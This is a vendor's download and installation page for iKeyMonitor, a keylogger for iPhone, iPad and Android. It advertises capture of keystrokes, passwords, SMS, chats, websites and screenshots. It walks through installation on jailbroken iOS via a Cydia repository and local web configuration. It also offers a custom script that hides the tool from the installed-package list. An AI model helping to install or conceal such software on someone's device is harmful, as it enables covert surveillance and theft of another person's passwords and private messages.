Download and Install iKeyMonitor
iKeyMonitor is the only Keylogger for iPhone/iPad/iPodTouch/Android with Keystrokes, Passwords, SMS, Websites, Chats, Screenshots logging features.
With both Jailbreak & NO-Jailbreak Solutions
All Android Phones | Tablets (Android 2.3+)
Download iKeyMonitor for iOS(Jailbreak Edition)
After installing and respringboarding, open Safari and enter "http://localhost:8888" to access the keylogger.
In iOS 9, if you can’t register it or send/upload logs, check this guide.
If "http://localhost:8888 can’t be opened" in Safari:
- In iOS 6 and below, try to reboot the device.
- In iOS 7, open Cydia and search for "Cydia Substrate" and upgrade it to latest version. Then reinstall iKeyMonitor.
If it still doesn’t work, please check this FAQ.
If you can’t find the latest version of iKeyMonitor in Cydia, please install iKeyMonitor from the official source.
- In Cydia, Select the "Manage" and then select "Sources" (Select the "Sources" tab directly when on iPad).
- Select "Edit" and then the "Add" button.
- Add a source by entering http://ikeymonitor.com/apt/.
- Then browse our repository to install it. After installation, open Safari and enter "http://localhost:8888" to configure it.
Install iKeyMonitor via a Custom Script
By using custom script, iKeyMonitor will be hidden from the installed package list in Cydia. This is only for advanced users who are familiar with use of the command lines.